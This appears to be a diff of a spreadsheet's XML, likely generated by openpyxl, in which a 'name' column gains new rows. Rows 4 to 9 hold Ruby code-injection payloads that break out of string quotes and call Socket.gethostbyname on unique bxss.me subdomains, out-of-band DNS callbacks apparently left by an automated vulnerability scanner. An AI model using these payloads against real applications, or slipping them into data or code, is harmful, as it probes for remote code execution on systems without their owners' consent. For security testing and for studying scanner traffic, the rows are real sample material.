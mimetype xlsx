--- v0 (2026-05-17)
+++ v1 (2026-07-05)
@@ -410,74 +410,150 @@
             <a:gs pos="100000">
               <a:schemeClr val="phClr">
                 <a:shade val="30000"/>
                 <a:satMod val="200000"/>
               </a:schemeClr>
             </a:gs>
           </a:gsLst>
           <a:path path="circle">
             <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
           </a:path>
         </a:gradFill>
       </a:bgFillStyleLst>
     </a:fmtScheme>
   </a:themeElements>
   <a:objectDefaults/>
   <a:extraClrSchemeLst/>
 </a:theme>
 </file>
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
   <sheetPr>
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:B2"/>
+  <dimension ref="A1:B9"/>
   <sheetViews>
     <sheetView workbookViewId="0">
       <selection activeCell="A1" sqref="A1"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
   <sheetData>
     <row r="1">
       <c r="A1" t="inlineStr">
         <is>
           <t>projectcode</t>
         </is>
       </c>
       <c r="B1" t="inlineStr">
         <is>
           <t>name</t>
         </is>
       </c>
     </row>
     <row r="2">
       <c r="A2" t="n">
         <v>1</v>
       </c>
       <c r="B2" t="inlineStr">
         <is>
           <t>xvlmsyegwr</t>
         </is>
       </c>
     </row>
+    <row r="3">
+      <c r="A3" t="n">
+        <v>2</v>
+      </c>
+      <c r="B3" t="inlineStr">
+        <is>
+          <t>94102</t>
+        </is>
+      </c>
+    </row>
+    <row r="4">
+      <c r="A4" t="n">
+        <v>3</v>
+      </c>
+      <c r="B4" t="inlineStr">
+        <is>
+          <t>"+"A".concat(70-3).concat(22*4).concat(118).concat(83).concat(104).concat(67)+(require"socket"
+Socket.gethostbyname("hitop"+"gbpwnmfy75032.bxss.me.")[3].to_s)+"</t>
+        </is>
+      </c>
+    </row>
+    <row r="5">
+      <c r="A5" t="n">
+        <v>4</v>
+      </c>
+      <c r="B5" t="inlineStr">
+        <is>
+          <t>'+'A'.concat(70-3).concat(22*4).concat(102).concat(75).concat(100).concat(87)+(require'socket'
+Socket.gethostbyname('hitbc'+'jatjelft3719f.bxss.me.')[3].to_s)+'</t>
+        </is>
+      </c>
+    </row>
+    <row r="6">
+      <c r="A6" t="n">
+        <v>5</v>
+      </c>
+      <c r="B6" t="inlineStr">
+        <is>
+          <t>'A'.concat(70-3).concat(22*4).concat(106).concat(69).concat(117).concat(78)+(require'socket'
+Socket.gethostbyname('hitjp'+'jwvbcmjn6d88a.bxss.me.')[3].to_s)</t>
+        </is>
+      </c>
+    </row>
+    <row r="7">
+      <c r="A7" t="n">
+        <v>6</v>
+      </c>
+      <c r="B7" t="inlineStr">
+        <is>
+          <t>"+"A".concat(70-3).concat(22*4).concat(115).concat(78).concat(122).concat(79)+(require"socket"
+Socket.gethostbyname("hitmn"+"fopbmstvba853.bxss.me.")[3].to_s)+"</t>
+        </is>
+      </c>
+    </row>
+    <row r="8">
+      <c r="A8" t="n">
+        <v>7</v>
+      </c>
+      <c r="B8" t="inlineStr">
+        <is>
+          <t>'+'A'.concat(70-3).concat(22*4).concat(110).concat(83).concat(106).concat(76)+(require'socket'
+Socket.gethostbyname('hitah'+'qvutdvkie99db.bxss.me.')[3].to_s)+'</t>
+        </is>
+      </c>
+    </row>
+    <row r="9">
+      <c r="A9" t="n">
+        <v>8</v>
+      </c>
+      <c r="B9" t="inlineStr">
+        <is>
+          <t>'A'.concat(70-3).concat(22*4).concat(107).concat(67).concat(119).concat(78)+(require'socket'
+Socket.gethostbyname('hitfx'+'vpgmpjod2446e.bxss.me.')[3].to_s)</t>
+        </is>
+      </c>
+    </row>
   </sheetData>
   <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
 </worksheet>
 </file>
 
 <file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
 <Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties">
   <Application>Microsoft Excel Compatible / Openpyxl 3.1.5</Application>
   <AppVersion></AppVersion>
 </Properties>
 </file>
 
 <file path=docProps/core.xml><?xml version="1.0" encoding="utf-8"?>
 <cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <dc:creator>openpyxl</dc:creator>
   <dcterms:created xsi:type="dcterms:W3CDTF"></dcterms:created>
   <dcterms:modified xsi:type="dcterms:W3CDTF"></dcterms:modified>
 </cp:coreProperties>
 </file>